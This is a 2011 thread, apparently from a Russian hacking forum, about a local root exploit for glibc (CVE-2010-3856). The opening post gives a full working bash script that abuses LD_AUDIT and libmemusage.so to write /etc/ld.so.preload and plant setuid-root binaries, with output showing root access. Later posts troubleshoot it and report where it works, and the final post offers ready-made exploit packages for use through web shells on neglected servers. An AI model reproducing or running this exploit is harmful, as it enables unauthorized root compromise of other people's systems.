Старый 30.08.2011, 12:17   #21
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

/lib/libmemusage.so

Код:
#!/bin/bash
# CVE-2010-3856
 
OUTPUT=/etc/ld.so.preload
 
MASK=`umask`
umask 0
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping 2> /dev/null
if [ ! -f $OUTPUT ]; then
  echo "System does not appear to be vulnerable"
  exit 0
fi
echo -n > $OUTPUT
umask $MASK

cat > exec.c << EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
EOF
gcc exec.c -o exec
 
cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main ()
{
  setuid(geteuid());
  setgid(getegid());
  execl("/bin/sh", "bin/sh","-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);
  return 0;
}
EOF
gcc sh.c -o sh
 
cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>
uid_t getuid (void)
{
  chown("$PWD/sh", 0, 0);
  chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
  return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
 
echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
./sh

Код:
./exec2 id
uid=0(root) gid=0(root) groups=80(apache)
Вложения
Тип файла: zip glibc2.zip (751 байт, 843 просмотров)

Последний раз редактировалось Pashkela; 30.08.2011 в 12:21..
Pashkela вне форума   Ответить с цитированием
Старый 30.08.2011, 23:24   #22
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

$ sh 1.sh
: not found
umask: 4: Illegal number: 0
1.sh: 56: Syntax error: end of file unexpected (expecting "then")


в чем косяк?
azid вне форума   Ответить с цитированием
Старый 31.08.2011, 00:20   #23
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

скачай файл из вложения, а не копируй текст из форума

Последний раз редактировалось Pashkela; 01.09.2011 в 09:23..
Pashkela вне форума   Ответить с цитированием
Старый 31.08.2011, 01:55   #24
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Дебиан 6 минимал (190мб дистрибутив качал 3-4 дня назад с офа)

Код:
b3gt@localhost:/var/www/test$ uname -a;id;ls -lha
Linux localhost 2.6.32-5-686 #1 SMP Mon Jun 13 04:13:06 UTC 2011 i686 GNU/Linux
uid=1001(b3gt) gid=1001(b3gt) группы=1001(b3gt)
итого 4,0K
drwxrwxrwx 2 www-data www-data   20 Авг 31 02:51 .
drwxrwxrwx 3 www-data www-data   88 Авг 31 02:44 ..
-rwxrwxrwx 1 www-data www-data 1,2K Авг 31 02:44 test.sh
b3gt@localhost:/var/www/test$ ./test.sh
b3gt@localhost:/var/www/test$ ls -lha
итого 52K
drwxrwxrwx 2 www-data www-data  122 Авг 31 02:52 .
drwxrwxrwx 3 www-data www-data   88 Авг 31 02:44 ..
-rwxr-xr-x 1 b3gt     b3gt     4,7K Авг 31 02:52 exec
-rwsr-sr-x 1 root     root     4,7K Авг 31 02:52 exec2
-rw-r--r-- 1 b3gt     b3gt      139 Авг 31 02:52 exec.c
-rw-r--r-- 1 b3gt     b3gt      207 Авг 31 02:52 libpwn.c
-rw-r--r-- 1 b3gt     b3gt     1,2K Авг 31 02:52 libpwn.o
-rwxr-xr-x 1 b3gt     b3gt     4,3K Авг 31 02:52 libpwn.so
-rwsr-xr-x 1 root     root     5,0K Авг 31 02:52 sh
-rw-r--r-- 1 b3gt     b3gt      269 Авг 31 02:52 sh.c
-rwxrwxrwx 1 www-data www-data 1,2K Авг 31 02:44 test.sh
b3gt@localhost:/var/www/test$ ./exec2 id
uid=0(root) gid=0(root) группы=0(root),1001(b3gt)
b3gt@localhost:/var/www/test$
b3 вне форума   Ответить с цитированием
Старый 31.08.2011, 11:14   #25
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

b3,Чото ты мутишь и херню городишь

snake@debian6:/tmp/e$ ./s.sh
System does not appear to be vulnerable
snake@debian6:/tmp/e$
snake@debian6:/tmp/e$ echo "/tmp/e/libpwn.so" > /etc/ld.so.preload
bash: /etc/ld.so.preload: Отказано в доступе
snake@debian6:/tmp/e$ uname -a
Linux debian6 2.6.32-5-686 #1 SMP Mon Jun 13 04:13:06 UTC 2011 i686 GNU/Linux
snake@debian6:/tmp/e$ ./exec2 id
uid=1000(snake) gid=1000(snake) группы=1000(snake),24(cdrom),25(floppy),29(a udio),30(dip),44(video),46(plugdev)

оп-оп?

или

uname -a
Linux com 2.6.31-22-server #73-Ubuntu SMP Fri Feb 11 20:20:46 UTC 2011 x86_64 GNU/Linux
sh s.sh
System does not appear to be vulnerable

оп-оп?
snake вне форума   Ответить с цитированием
Старый 31.08.2011, 11:25   #26
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

сплоит с libmemusage это фактически тот же способ с libpcprofile, так что свежак не может быть уязвим. ограничения все теже, баг запатчили еще 2х октября 2010
Andrey1800 вне форума   Ответить с цитированием
Старый 31.08.2011, 11:51   #27
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

2.6.27.56-0.1-pae #1 SMP 2010-12-01 16:57:58 +0100 i686
$ ls -l /lib/libmemusage.so
-rwxr-xr-x 1 root root 13980 Oct 26 2010 /lib/libmemusage.so
$ sh test.sh
System does not appear to be vulnerable

2.6.18.8-linode22 #1 SMP Tue Nov 10 16:12:12 UTC 2009 i686
$ls -l /lib/libmemusage.so
-rw-r--r-- 1 root root 13696 Jan 11 2011 /lib/libmemusage.so

Тетсанул на других системах 2011 тож самое...видимо ток на старых машинах юзать можно где админы болт забили на систему)
azid вне форума   Ответить с цитированием
Старый 31.08.2011, 14:34   #28
mythtrandyr
 
Регистрация: 19.04.2011
Сообщений: 29
Репутация: 0
По умолчанию

Этот способ просто альтернатива, для систем в которых нету libcprofile.so....а не как обход патча этой уязвимости!

А систему которую он пробил, с датой 2011год. он пробил только потому что он её установил с диска без обновлений! Если скачает обновления то естественно уже не порутает.
mythtrandyr вне форума   Ответить с цитированием
Старый 31.08.2011, 15:20   #29
kfor
 
Аватар для kfor
 
Регистрация: 27.01.2011
Сообщений: 119
Репутация: 39
По умолчанию

Не в ту сторону думаете =)) вот где то в привате ходит сплойт под 2.6.18-194 x86_64 2011 значит где то что то недопатчили...
kfor вне форума   Ответить с цитированием
Старый 28.09.2011, 18:54   #30
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Ибо заманали однотипными вопросами (в других темах), вот все три возможных (инфо 99%) сплойта (готовых) на эту тему в одном месте в виде файлов готовых, качайте и если не сработало - пишите ошибки

если у вас в шеле нет возможности поставить галочку напротив

redirect stderr to stdout (2>&1) - позволяет увидеть ошибки при использовании сплойтов локально (через веб, без бекконекта) в консоли

то так и юзайте:

sh sploit.sh 2>&1

и увидите все ошибки

PS: Должно сработать при условии, что:

1. Админ безмозглый (ибо даже не обновляя библиотеки можно предотвратить эксплуатацию, так что дата сама по себе ничего не значит особенно)
2. Уязвимые библиотеки:

/lib/libc-2.[тут_какая-то_цифра_или_две_даже].so - полезна, если у вас недебианподобная ось, и просто информация о версии glibc именно здесь
/lib/libpcprofile.so - для дебианподобных осей
/lib/libmemusage.so - для дебианподобных осей


имеют дату ДО 01.10.2010 (примерно)

посмотреть все данные по дате о библиотеках можно так:

ls -la --full-time /lib thx 2 col
Вложения
Тип файла: zip glibc.zip (1.9 Кб, 1316 просмотров)

Последний раз редактировалось Pashkela; 27.05.2012 в 18:31..
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot